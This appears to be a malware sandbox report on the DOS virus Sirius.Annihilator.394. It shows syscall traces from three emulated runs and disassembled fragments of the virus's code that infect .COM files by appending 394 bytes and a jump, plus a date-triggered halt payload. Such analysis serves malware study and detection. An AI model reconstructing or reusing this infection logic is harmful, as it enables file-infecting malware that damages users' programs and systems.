Sample viewer

vx.netlux.org/Virus.DOS.Sirius.Annihilator.394

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:12:11.79424996Z	26	PC: 15182 \| Set disk transfer address
2018-12-17T23:12:11.797189057Z	78	PC: 15196 \| Find first file
2018-12-17T23:12:11.804372966Z	61	PC: 151a3 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T23:12:11.811854274Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.813797699Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.816428817Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.81913158Z	61	PC: 151a3 \| Open file (Filename = 'PRINT.COM')
2018-12-17T23:12:11.826371444Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.829272299Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.831781707Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.835028142Z	61	PC: 151a3 \| Open file (Filename = 'HELLO.COM')
2018-12-17T23:12:11.843054576Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.845017407Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.847370122Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.854179937Z	61	PC: 151a3 \| Open file (Filename = 'PHANG.COM')
2018-12-17T23:12:11.862038305Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.8635456Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.866234877Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.869079055Z	61	PC: 151a3 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:12:11.876159459Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.878160091Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.880171554Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.883102856Z	61	PC: 151a3 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T23:12:11.890871986Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.892955654Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.895398258Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.898666052Z	61	PC: 151a3 \| Open file (Filename = 'PAH.COM')
2018-12-17T23:12:11.906336607Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.908287285Z	62	PC: 151ca \| Close file
2018-12-17T23:12:11.910578023Z	79	PC: 15196 \| Find next file
2018-12-17T23:12:11.914103803Z	61	PC: 151a3 \| Open file (Filename = 'TEST.COM')
2018-12-17T23:12:11.920996224Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.9223873Z	87	PC: 151ba \| Get or set file date and time
2018-12-17T23:12:11.924364808Z	44	PC: 151da \| Get time 0x151da: or dx, dx 0x151dc: je 0x151d6 0x151de: mov word ptr [bp + 0x28c], dx 0x151e2: mov ax, 0x4200 0x151e5: call 0x1526f 0x151e8: mov ah, 0x3f 0x151ea: lea dx, word ptr [bp + 0x22e] 0x151ee: mov cx, 3 0x151f1: int 0x21 0x151f3: cmp byte ptr [bp + 0x22e], 0x4d 0x151f8: je 0x151c6 0x151fa: cmp byte ptr [bp + 0x22e], 0x5a 0x151ff: je 0x151c6 0x15201: mov ax, 0x4202 0x15204: call 0x1526f 0x15207: sub ax, 3 0x1520a: mov word ptr cs:[bp + 0x22c], ax 0x1520f: lea si, word ptr [bp + 0x105] 0x15213: mov di, 0xfb90 0x15216: mov cx, 0x18a
2018-12-17T23:12:11.927291542Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.928634988Z	63	PC: 151f3 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:11.932001199Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.933510387Z	64	PC: 1522c \| Write file or device (Write 394 bytes on handle 5)
2018-12-17T23:12:11.947866052Z	66	PC: 15275 \| Move file pointer
2018-12-17T23:12:11.950511407Z	64	PC: 1523d \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:11.953533069Z	87	PC: 15244 \| Get or set file date and time
2018-12-17T23:12:11.955336611Z	62	PC: 15248 \| Close file
2018-12-17T23:12:11.966953055Z	42	PC: 1524c \| Get date 0x1524c: cmp dh, dl 0x1524e: jne 0x15263 0x15250: mov ah, 0x2c 0x15252: int 0x21 0x15254: and dh, 7 0x15257: jne 0x15263 0x15259: mov ah, 9 0x1525b: lea dx, word ptr [bp + 0x237] 0x1525f: int 0x21 0x15261: cli 0x15262: hlt 0x15263: mov ah, 0x1a 0x15265: mov dx, 0x80 0x15268: int 0x21 0x1526a: mov ax, 0x100 0x1526d: push ax 0x1526e: ret 0x1526f: xor cx, cx 0x15271: xor dx, dx 0x15273: int 0x21
2018-12-17T23:12:11.969499714Z	26	PC: 1526a \| Set disk transfer address
2018-12-17T23:12:11.972966062Z	9	PC: 12a5d \| Display string (String= '')
2018-12-17T23:12:11.983528846Z	9	PC: 12a64 \| Display string (Could not find end pointer)
2018-12-17T23:12:11.994984838Z	76	PC: 12a7a \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17438,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:55:48.719792039Z	26	PC: 15182 \| Set disk transfer address
2018-12-25T12:55:48.721208569Z	78	PC: 15196 \| Find first file
2018-12-25T12:55:48.725672653Z	61	PC: 151a3 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:48.729954186Z	66	PC: 15275 \| Move file pointer
2018-12-25T12:55:48.731265247Z	62	PC: 151ca \| Close file
2018-12-25T12:55:48.732393296Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.733933279Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.741207931Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.742117787Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.743422872Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.745420873Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.752587635Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.753610896Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.758426666Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.760767526Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.772099521Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.773846356Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.775451915Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.777839987Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.784552918Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.786313134Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.788442397Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.792039412Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.798477795Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.799740434Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.807168027Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.809580745Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.81580951Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.817605666Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.819184113Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.821453947Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.829452257Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.83053278Z	87	PC: 151ba \| Get or set file date and time
2018-12-25T12:55:48.831518299Z	44	PC: 151da \| Get time 0x151da: or dx, dx 0x151dc: je 0x151d6 0x151de: mov word ptr [bp + 0x28c], dx 0x151e2: mov ax, 0x4200 0x151e5: call 0x1526f 0x151e8: mov ah, 0x3f 0x151ea: lea dx, word ptr [bp + 0x22e] 0x151ee: mov cx, 3 0x151f1: int 0x21 0x151f3: cmp byte ptr [bp + 0x22e], 0x4d 0x151f8: je 0x151c6 0x151fa: cmp byte ptr [bp + 0x22e], 0x5a 0x151ff: je 0x151c6 0x15201: mov ax, 0x4202 0x15204: call 0x1526f 0x15207: sub ax, 3 0x1520a: mov word ptr cs:[bp + 0x22c], ax 0x1520f: lea si, word ptr [bp + 0x105] 0x15213: mov di, 0xfb90 0x15216: mov cx, 0x18a
2018-12-25T12:55:48.833511074Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.834904566Z	63	PC: 151f3 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:48.841104569Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.843041229Z	64	PC: 1522c \| Write file or device (Write 394 bytes on handle 5)
2018-12-25T12:55:48.858586547Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.859790937Z	64	PC: 1523d \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:48.862981933Z	87	PC: 15244 \| Get or set file date and time
2018-12-25T12:55:48.864364563Z	62	PC: 15248 \| Close file
2018-12-25T12:55:48.871892943Z	42	PC: 1524c \| Get date 0x1524c: cmp dh, dl 0x1524e: jne 0x15263 0x15250: mov ah, 0x2c 0x15252: int 0x21 0x15254: and dh, 7 0x15257: jne 0x15263 0x15259: mov ah, 9 0x1525b: lea dx, word ptr [bp + 0x237] 0x1525f: int 0x21 0x15261: cli 0x15262: hlt 0x15263: mov ah, 0x1a 0x15265: mov dx, 0x80 0x15268: int 0x21 0x1526a: mov ax, 0x100 0x1526d: push ax 0x1526e: ret 0x1526f: xor cx, cx 0x15271: xor dx, dx 0x15273: int 0x21
2018-12-25T12:55:48.874422996Z	44	PC: 15254 \| Get time 0x15254: and dh, 7 0x15257: jne 0x15263 0x15259: mov ah, 9 0x1525b: lea dx, word ptr [bp + 0x237] 0x1525f: int 0x21 0x15261: cli 0x15262: hlt 0x15263: mov ah, 0x1a 0x15265: mov dx, 0x80 0x15268: int 0x21 0x1526a: mov ax, 0x100 0x1526d: push ax 0x1526e: ret 0x1526f: xor cx, cx 0x15271: xor dx, dx 0x15273: int 0x21 0x15275: ret 0x15276: jmp 0x17b10 0x15279: jmp 0x17989 0x1527c: sub ch, byte ptr [0x6f63]
2018-12-25T12:55:48.876916547Z	26	PC: 1526a \| Set disk transfer address
2018-12-25T12:55:48.879775323Z	9	PC: 12a5d \| Display string (String= '')
2018-12-25T12:55:48.882098089Z	9	PC: 12a64 \| Display string (Could not find end pointer)
2018-12-25T12:55:48.892314527Z	76	PC: 12a7a \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17438,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:55:48.764998354Z	26	PC: 15182 \| Set disk transfer address
2018-12-25T12:55:48.766154883Z	78	PC: 15196 \| Find first file
2018-12-25T12:55:48.771933809Z	61	PC: 151a3 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:48.77841657Z	66	PC: 15275 \| Move file pointer
2018-12-25T12:55:48.780209278Z	62	PC: 151ca \| Close file
2018-12-25T12:55:48.781398015Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.783022024Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.790632096Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.791659983Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.792795898Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.798040755Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.804934608Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.805848501Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.812018153Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.815366391Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.821635563Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.82337657Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.824999887Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.827312685Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.83404914Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.835326411Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.836901243Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.839559423Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.845743718Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.846961109Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.848886125Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.851124723Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.857994924Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.868354209Z	62	PC: 151ca \| Close file (See above)
2018-12-25T12:55:48.869932048Z	79	PC: 15196 \| Find next file (See above)
2018-12-25T12:55:48.872222421Z	61	PC: 151a3 \| Open file (See above)
2018-12-25T12:55:48.884640861Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.88584238Z	87	PC: 151ba \| Get or set file date and time
2018-12-25T12:55:48.887032072Z	44	PC: 151da \| Get time 0x151da: or dx, dx 0x151dc: je 0x151d6 0x151de: mov word ptr [bp + 0x28c], dx 0x151e2: mov ax, 0x4200 0x151e5: call 0x1526f 0x151e8: mov ah, 0x3f 0x151ea: lea dx, word ptr [bp + 0x22e] 0x151ee: mov cx, 3 0x151f1: int 0x21 0x151f3: cmp byte ptr [bp + 0x22e], 0x4d 0x151f8: je 0x151c6 0x151fa: cmp byte ptr [bp + 0x22e], 0x5a 0x151ff: je 0x151c6 0x15201: mov ax, 0x4202 0x15204: call 0x1526f 0x15207: sub ax, 3 0x1520a: mov word ptr cs:[bp + 0x22c], ax 0x1520f: lea si, word ptr [bp + 0x105] 0x15213: mov di, 0xfb90 0x15216: mov cx, 0x18a
2018-12-25T12:55:48.889475807Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.890669664Z	63	PC: 151f3 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:48.897341033Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.898575727Z	64	PC: 1522c \| Write file or device (Write 394 bytes on handle 5)
2018-12-25T12:55:48.910708092Z	66	PC: 15275 \| Move file pointer (See above)
2018-12-25T12:55:48.91165186Z	64	PC: 1523d \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:48.913762237Z	87	PC: 15244 \| Get or set file date and time
2018-12-25T12:55:48.91503187Z	62	PC: 15248 \| Close file
2018-12-25T12:55:48.922505137Z	42	PC: 1524c \| Get date 0x1524c: cmp dh, dl 0x1524e: jne 0x15263 0x15250: mov ah, 0x2c 0x15252: int 0x21 0x15254: and dh, 7 0x15257: jne 0x15263 0x15259: mov ah, 9 0x1525b: lea dx, word ptr [bp + 0x237] 0x1525f: int 0x21 0x15261: cli 0x15262: hlt 0x15263: mov ah, 0x1a 0x15265: mov dx, 0x80 0x15268: int 0x21 0x1526a: mov ax, 0x100 0x1526d: push ax 0x1526e: ret 0x1526f: xor cx, cx 0x15271: xor dx, dx 0x15273: int 0x21
2018-12-25T12:55:48.924870846Z	26	PC: 1526a \| Set disk transfer address
2018-12-25T12:55:48.927330779Z	9	PC: 12a5d \| Display string (String= '')
2018-12-25T12:55:48.929428422Z	9	PC: 12a64 \| Display string (Could not find end pointer)
2018-12-25T12:55:48.941116471Z	76	PC: 12a7a \| Terminate with return code (Return code = '0')